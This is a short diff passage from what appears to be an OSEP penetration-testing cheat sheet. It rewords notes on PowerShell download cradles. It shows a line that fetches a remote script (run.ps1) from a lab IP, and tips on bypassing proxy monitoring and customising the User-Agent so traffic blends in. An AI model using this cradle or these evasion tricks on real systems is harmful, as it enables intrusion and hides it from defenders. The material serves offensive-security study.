peterkhe1999/CheatSheet/OSEP/README.md

 $wc.DownloadString("http://192.168.119.120/run.ps1")
 ```

 In some environments, network communications not going through the proxy will get blocked at an edge firewall.
-Otherwise, we could bypass any monitoring that processes network traffic at the proxy.

 ## Fiddling With The User-Agent

-The Net.WebClient PowerShell download cradle does not have a default User-Agent set => the session will stand out from other legitimate traffic => Customize User-Agent
+The Net.WebClient PowerShell download cradle does not have a default User-Agent set => The session will stand out from other legitimate traffic.

+Customize User-Agent

 ```pwsh
 $wc = new-object system.net.WebClient